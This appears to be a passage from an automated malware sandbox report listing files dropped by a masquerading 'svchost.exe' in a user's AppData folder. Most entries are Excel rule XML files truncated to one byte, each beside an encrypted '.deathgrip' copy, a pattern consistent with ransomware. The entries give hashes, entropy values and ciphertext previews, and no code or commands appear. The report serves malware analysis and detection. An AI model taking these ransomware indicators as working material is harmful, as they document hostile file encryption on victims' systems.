                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700650v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1728
                                                          Entropy (8bit):7.8290676675441855
                                                          Encrypted:false
                                                          SSDEEP:24:ODvgcdC8f0+wNN1JXer7VWoucJG0ccZcQIsMHrMUyBlNUsOBaDbo3WQZ:GUpJXer7VZvJUcZt4QLNROQDbKhZ
                                                          MD5:2B6A6D01519A9CB677981D5C3D3DEB96
                                                          SHA1:B7C7535E5AA0F8634C7332FA8B944DF3E99E1011
                                                          SHA-256:67F015AFF988526437C9FA217C521C89DDF4EE1624A5F8495587EDC0D844D272
                                                          SHA-512:68D3B8422CACF08DAC84E9C8642E2561180D9F803A4F719A7D2C712FCDFE5C55A02D7854FAD28948017531BAB0E227F4D1205647DB4F2A0A74789C00C81425FA
                                                          Malicious:false
                                                          Preview:............JE<.IV=%....}D......{8SR.t.l.q'^._..?s..G.....mu>T.5.3.j8I.RXcs.s.{..t...%K..j.m{.Pa^.eiU..TP.L.*]h....K..|.s....q....s8...r....xa.S...x....s..'.y..uA.....>.........m.....n........;Lss(u,]..$?.vK[..>fL..St...[.M......ZV.SE....4.G?2{|.x.}.R.p..A.L..3...<..ra.....{~. ^.X..\.....D../c..TY....O....0...*JnC,.R.... o...9.ps....m........5...1.U'3...?U.m..P....sz....."..&*0...*../.A..'.d...xE.!+...s..*l,b|c..,..(<.......+GN..vh.J...q@.H#[.l.......!.f..f?...T..}...........Ii.&.N.lF....S.g.[.E.1..=.a.v....W^..l@....#....k8P9.....)Yz..WL........7.]O..4....X.E..o.+...rt.)H.4..~d.H..".yK...=..x>...8r..cz.c~v...5.....-...P!NT.7y...)..lx.S.6.....a....6.N....v..-.....{\.~.,..:..{..U....xt%...&..F.>........N..#N.-....$.x......Z.$S2..;.Z.w...'.U.Rl.H.M..)/.g(.EB./...<i.. ....3i./..m.........X..p3.ng.99..!.a_.N.....VrR...{...2S...\C4.ni..Z.._...@.'.....Kg....q........P....sh.=o....(.....x.....Z0..P..O.... .].\...p................[..

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700651v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700651v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1760
                                                          Entropy (8bit):7.806368952951853
                                                          Encrypted:false
                                                          SSDEEP:48:oVXRosuZ8VmmY6SnLdCp0V9NE8f/cOhKf8a+:oVHPSLIpcEA/jhss
                                                          MD5:FB5991207B437DAD44299EBD57AEF3C0
                                                          SHA1:FD58773AC39306C6E50715284C7BBA6FE51FB69D
                                                          SHA-256:69F01D0A54CC1077BCEE8CC6749382DEF8602A9F9BEAA039958EBF8F734536D6
                                                          SHA-512:8F75A5C8F8A9A171A0C567493FDDB75149001310EE2DDB4116C383465BED879DB064799F7F8CB8747BA4B843139E43C7CF1840C837115E1628A6BDD982BB78E1
                                                          Malicious:false
                                                          Preview:.........z.....+uJ.xR......4;.Y.~..R......{......BE`.\Xw.q.t.....-.2s...z.*u.;.1!.OC..hb...K.,....z.......U;.&gl.'`ZW.....f..~..S.<ZW.,fW.~'zE.<.........5L.P..|.j..h..;....K@l)...3.Rn...=S.....g......o.*.2.z..r.5..cc..<..!....f.Gnd."..pp%.I.u1.1`..+..a.|.$n@...o..,.:..*../.....(g/....d}J......c.u...c.%~H.|]..N..z:.3Df.....W.)......C..a...wl.%..,...g...3..E..=TZOZc..<....g.t~.V.........@...>l.|.f.;.,q,+W%....Nk.u..SYM.N.).........o......f.j((........eV.^o.n.....U?..R..o....}ao....mq.v\..iF7..76}A...Ej. .g....*.C.-...p.#...V....X.+Q...`...*..u.F....=...:1m4k(.O....gU....1....FIPy..uI.a-"...._..?.."....S~z.(.....`...+...............pv..B....]O...$...;...!../.$..M.v `.R.Txz.=M..$.....Z5C..........z].X&.B...7...8.....4....G.>.....u6......[..%dI.6Z22..O.+?c{.q.......O..=.M.......9....B5.3.G)..9]p]-.@u....2.uH..%.j.y......./..(q.K..16_.....C.D....G!..f.....$..l+.T)@@9.9.....J...w%.n.qHb.q.....W.i2.A.L.I.l.......Y..@...x..C.(/.m%.....+..?...k.w.....J..cf.

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700700v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700700v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700701v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700701v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1760
                                                          Entropy (8bit):7.812431616587897
                                                          Encrypted:false
                                                          SSDEEP:48:FGV6y78+vhPKz33SYZA1d8PAubIHwzHakJ5CXWz:snvsz68PTkHQHakJkWz
                                                          MD5:5A09A1FCCF5CF9BA6081875B861A4CAA
                                                          SHA1:B98E454344084CF2AE75E6DA7E5C326801328779
                                                          SHA-256:3314B2AA05228D0831A2221F95905ABF43FF66686ED9D4F5C84688BB7CA447F7
                                                          SHA-512:3B12D28C4496CA63EB2507775CEB30BF8BAD1FC27F7F7D3F419FA54937481A224DFD5F15E3D6EA4403644AFC7DA092744277C121D2C5CCCB8A1EA0C9380DCAFC
                                                          Malicious:false
                                                          Preview:........^CN. ..G3.-n,..g`...JW.u..O6a.C.3v.Zyo.....u.-F..>.4...H.W...Hw.......Ge.K.%p.:9..y*x......@[c.=R{..9].i......,D.wG_]......"wM.U..^<F4...Ov.L.;B...aw..'_.5.*.O.j.@.$.t.).e....LB.y..=.@...........V...]..=.<...84...W....N.I.Kc....42)^...os....^.H(.b...W ....#^..??.#.D.m.".wdmL.G..Rw.@.&/'..+..E..aW6Q.nH......x..G..r.yi..M4."1..n...e..!H..!.^a...L.:.%V."...y.7H.....7........|..x...o.4..2..U.|..5a.w.....sq:......(.@K.T.S...h.jD.;q.=...-... L.....8.....c.....:...g.k..\.YS......R....4S.<=\.qge...|D.#....v.|.......H.....b.q.L..?.....T./dOQ..........CV....(...k9....L8...>2).>.~XL.X.......$.d.)"2~..!~.ZKG....6...V2...~M..;.v..Z.WM...H.)...1;.C.5Gn....,:..x._..3....^#.m.......'!..x.......R../.< Dk.Q#.?.t.$....g........B...K..,.pP.d(O....1.&vY.rl.e...k../....@7....S.........<.j.....&...n.-.+.....=.R..].A......o..6]b....=....q.8....7L^]K.......3-.Pv.......Y...})B.UqN............=(.>. ..:S'....7F..p...m..V.b..JU..8&..G@...Oj.o....&..E.<i

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700750v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700750v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1744
                                                          Entropy (8bit):7.802851375372702
                                                          Encrypted:false
                                                          SSDEEP:48:F5/PNbhG45nZTFyZIlM6Jsde1fRQsZ3zaJh09:blhG45gd6d5QUGi9
                                                          MD5:73D60782E093D6FCC28C7A6FAB18D0FB
                                                          SHA1:69F27B65EF88ACAAE9505D7365C84ED26AF7BAFE
                                                          SHA-256:202C8B7284A7834468FE7F75EADFF69D840E0135642F4A50E09CA6FC53514461
                                                          SHA-512:9F6ED8B14D0CC2A6108E9D0C1FD807F2ABA61EFA95B54E47BBF0D4B29A8686FA77FA8D88D1EEF9C4D52059104028C662F30441E7CBA22BBD3B039D0B569BEE7C
                                                          Malicious:false
                                                          Preview:........^CN. ..G3.-n,..g`...JW.u..O6a.C.3v.Zyo.....u.-..gIH[.4~....Q.u:.hE...J=9`..'E.o.P...:.<....y1A.'.S.As..!...A3!.>...u......>`X.v..4W...;....mT."...z.O$...0..^.......+.i..6....m..w.+T.{i...y8..H........D.TN..........A.sL.i7..Q........=....q....xvQ~...z.`*..l."b.\Y.k......([r.oKq=86....DB....+.Z..j..,..j.{..Q..+.g.lU.R>/.:%DS....V......,!.3.B.........T.P.q|.'U.N.mQp..M{.,......J..........M..Qx....{T...}..s'...;.Zk......DTu..c. .K:+.......7J.,Jj. p..i..Ai\xe..&Tl.e..d..Kk/.M`..v.G_...2..g.=..d.S.....!.<.C.v.......r./[.U...e)....G..#..?.......~.LS.......c.L.P...`k..Q.F?...;....4[..&E.,..>.N.#X.7+^q...vK.^%#...iB?...Aj..^#....=.y20..(.(I.=...pS.xq9.OT5<.o.D.q7..(.$#...o?.-..:...../.We.c..t.~..c..u..0.......QuG..S.#..iNcl...~..3.n*..G......@.Wv.%k.:...l...........[T.$........J...q.....~i........P......u.9A....^bB..,.....N....iN....8::.n.T.....d.wIl.N....b....0...@9.....7.7.:.R0..I.......8%.c..o...!...KY!.'U......?_.y...a..U..e...+.l*

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700751v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700751v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1776
                                                          Entropy (8bit):7.821037178146455
                                                          Encrypted:false
                                                          SSDEEP:24:1HRfD/9aYzmWm5LH44MN3LvDao20+WsYxi23aWA9wfdzNACNUzn/v1p0DK1ny9e:tRbwezm5YNFTsYxi2TOpCNk/0e1nyg
                                                          MD5:7DDBC73D8E02F270E6C10D07E9E4D916
                                                          SHA1:E6E6DA654391706DBCDFD6C0F642CACB207315DF
                                                          SHA-256:C9E17467A5394E12AA95FA3D9CBB102AEACFE91BFF3DA4B738A28015C2D001E9
                                                          SHA-512:20397E1B4911E232C887311F9106E85BFCFA53D941CF948678A15F08350B573279E0CB015D9A0326494F32A5EF7015B00688516F8607837EDBD4C28CD8BF8802
                                                          Malicious:false
                                                          Preview:........[..c9.8....Z`0VNs.GM..:.[..?j..[.=_+eJ.d|..V.!...j.......3.u.p..........U....b.y.<..EE...!C1...\.-.22..},t.O!/p.n..8lE..e{...d0U.[3...[....}..i..r.Tlvz..6Em.b...Xqi....8...).}..>0...JZ.i...h...._e.`Q&c/,.. -.j.....O.c.....n..)J)...6eeY..(......T..k.[.s..=[.z@...@..Iy.lJ.....K..m...j..ha...P.zmZM....."..............Uq..9.....H.%\.7B...B.=T.*\-H.*...fY\...x........u...ND...e.......%....c....4n....I~.o.u...Yk..D.Q.^..d..c..P.U.a....e.+.I..&../._.J..<V...1Z..2.V...........&\.uP.FC...ko...}..`XxQ....w.6E.<..Y*(..Y..G.6.[.q<.(.j}Y..q ...$....^..I..y.q.....iv....:.i/..h..-....b...G...I[..x~.C0..A.L+V.G...X*B*.8.p...).#..&..\Jq...6.M!|..7....... .}.'...k.!..)&..w..]a...E...$P.%...?u*X.O.Qo<..."{.2.>Q....0.}........../...s.~."....x.M..B.....:tx.b.j+3.E.VgO..-.t.2.T".`.....cl.7[c.`..(.4.u.:..v..k....N^\.+zr....-....;....rZ.....M3yU.s...-....~.(......m.J.Wn.....b.{...vA.1..k...p(.....y2Q_...Ir. .b..]...YM......nJ}.d...{..Et9j2T.t..h....x..

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700850v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700850v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1744
                                                          Entropy (8bit):7.82674971654153
                                                          Encrypted:false
                                                          SSDEEP:48:8wllirMLDPmCfm/tajp5/H32VPLmj5/JgYbQC6RonT:8PrMfertSH/KP6j1Jy2T
                                                          MD5:C04472314143215F175F961BC831177F
                                                          SHA1:015503A8831B530675E520E9B1A1E851E57D60A5
                                                          SHA-256:884A38DCE34378BC4FC549606291B3C680F63C5AC76DE822BA675E1A1F2DC92A
                                                          SHA-512:10A3BB4658DF6FB682278EA1A6FD1880FCE3E6D4DF3835B93FC513FFE0EA818199175D412576B767C4468BE82AE6DDA3226245524918CDCF2857B9E544D39EFF
                                                          Malicious:false
                                                          Preview:.........cd...G.a.dd..l.So.MDG.*....y.(.6zP............V..5....4.Q..... ._>.......Y..5......x\zb........b..n.4)...Y....U8.'.7...y.r..L3.k.l..t...2B.j ....\.v..+.7.#X.z....%..*...R.....\....vt..~.T...D........=.%Q.w.%\.xv.G.c.e.$....y*&...C........cK..I.F./.6E..Q.Yd.z.q ......wnv?.E.3...Xs.._.';.x...?....].a...E.=.j=e.TLw....M.....yx.a3..u....l;..=......8..Cn..Uj.k\....Z..`.w..'..>....Q.m.:6)8.c.|..|.L...R....b....m...7.,....,q.....o..m8.s.@.e..i....Kgg.....S.M.`N..0#[....D.P`....}.....h...0...6..v.x.....B.e.5.~..?....J.6h...(.>....<.@.t...N..L....n....H.!..N...;c.5..........A....".0A.....=.....E..I.>.*...i..U...BY.._..v......CUb.+w...l.MvD...P}.o...$..).$g..Z....**..B.....;X...._...F.G..`z`.n.>T..........5a.:..[.'..L.04.c `.FpY|H...........>=.....!......Y.....;#.8./s..t...&........JW.....b.v...N>........O...{S.s]........@..3._..K...B....6...9..QT.p..*c...AO%jh..u.6.mY$...*.... y...+r.p....Jo..V.N...E...~/.C.....3....M.-Nw,n|.)..~..k....1`.

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700851v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700851v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700900v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700900v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1728
                                                          Entropy (8bit):7.806863621342457
                                                          Encrypted:false
                                                          SSDEEP:48:StQPkFr3SGlg4JCTU9wnmeB5/sCXpXs9a:lkFrA4CUC5/s1a
                                                          MD5:F3C1CAB92CBFF12756DEBAEB2BFA6C56
                                                          SHA1:4B4AE2B5F745BBDB1B3B752E6F02F5093FE550D6
                                                          SHA-256:21DC285036D0FF396E29A52C64A5114BCF50C98A1ABE5B74F370349ABE4E69F5
                                                          SHA-512:2A4860FB557B3F86778D680D3899316F588FFE5C8EA78B8912DA08F8F92EB620A874BFD9A90B0FAD31FF234F0FA467EEB877D014DF00E0276462DE8CC0DAA942
                                                          Malicious:false
                                                          Preview:..........wW...7J..b...TF..]D,Kg.W..`C..S.j}.4vyq..?..A..~...zrQ~w+z...........k....x%.Z...2U...Z...l.3.DP....E...6.Ef.OEG.(d%.:.i......>%.....b.*..Q.".....+.d.2..8WC. ..S....,../._ %...F.`>.0....i..S....E..S$-.B..m.c.h....6....Ll.+.}...t....9.%..~.O.JM.S.Y.q!....85t..h..Q...r...{...&..u~...s.QT....z...d...9#}.sJ..q%z.ZI.&.z5....k.'......;.F\....[RL1.p....cP.]RJ..%.&....1.OE...,!.=%.f.......&_..P.J.1.7..<..l....{'t........Z...fB.......|.]p.M:..Nq._...l..#..-.b0 .M.L...J..U.....[...WRmyd".DpTX`o..5_7....+......E~ .X..'....eV0.....oQ....-Y...<5..d2R..8Q$.K.....!e.CEJ.7:...h..../.W.V..... d...(ef...Y...5...N>.P_[..h..m.*..P......XU.P.3.......Z^.......w.s.h_._...A.mq........Q.4. g....?..N v.j.EQ.:..h[I.y_v..H6V..,Uf..Y.>....\..7.8.O.c...[......mv..:n.~.......@..)J...e(.NU..dAD.:.:6........Q.Wo..N..J...b.p...^.G...,=Z..GX......v...b..>..c.@.=(...:/.C..JR2{D.KZ(...|.wN./..)G).j..H3..J<...%.+5.j.#.,.,8[`xSr\...J....S......._-b.l.a......94.....w..XHf.^.^

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700901v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700901v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1760
                                                          Entropy (8bit):7.816401584935664
                                                          Encrypted:false
                                                          SSDEEP:24:8jQqWSwUXUOyv4pUiQGx7rJ/Lgdg4n/Bx+hzkzVKhbnawzqsJcmeOEqLmz7:7qWSBUOu4BTfJT0tnChMKRamqsmfONq3
                                                          MD5:8C697CE835D448472B7FEE6E1F458C52
                                                          SHA1:5E7CB5138BC1B67B60B481B7335CA835346CFB05
                                                          SHA-256:9E59954B595C3C5676BDA1D603951EA77E2C4844D087EFD7C71638BEE14F4582
                                                          SHA-512:9C1663027FC4F40504D42C39BCF529A5E82F6407749AEBB4E0BD7DB88969D9DADFA8EBD2FC434AFF80CFA28D5472C2FF1849A4F296F9DB022251C7C878EA6405
                                                          Malicious:false
                                                          Preview:........y)...Ln.k..b.g....Tn3..!0..}V:7T.#.8....Xf...z...$+.:...8i,%....J. ...hd..Hi...Z.....y<.=.b.-......NIV..s.#..L....+.~.xc.I#/.I.f..:....a~..]..Q;...3B#...e8.f!.'..y.N...D.3.eB.n.i.%....-t.W..[...].<....`!...8...\.b\.y F.z....yo/.[.N.I..:....e...lLl....z.b<.i..#s...KQ....B.(.../...U./.. ..GD......X[./.N..~...c.G=.18K.l?5.r.'..`.j...*QL..J....bR?....Bu............n.Z..u...j#...:...c(.._#.DSY}....t.N.B'...D...h.k...k..%.#.b.G.7>..)..V..L..:.h..^3J8..J.pK2....>..O.l......Gy....-..:T....bl.d..B.l0j].M.BT..r.Xd....3i..)+.M'p..Rhr..kit.`..E5..............$A.....C.:.T-...|........8ve. ...s......oE.....EV.=.#]?.l^....)..5..F.*;;.h^j1.|......;.1\$...V.........3..;..F.ZH../..<F...&.@.Y@..ag.;..u.r.s..al...b.w..W.;{.pX.~..BS..'....7....5.....c...y ..-..U...C..VJ';.(..&.......z.....e3..o....Vq.Zh..%.v2.A.0.1.........|#.$Gs.....G.VzO.{E......T.....aF.o.1.Of`..Aj....f....D...[.i6...$.r.&.F+B#m..X0..... I...-. .M&.V.;i.8....a"...x:..

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700950v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700950v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700951v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
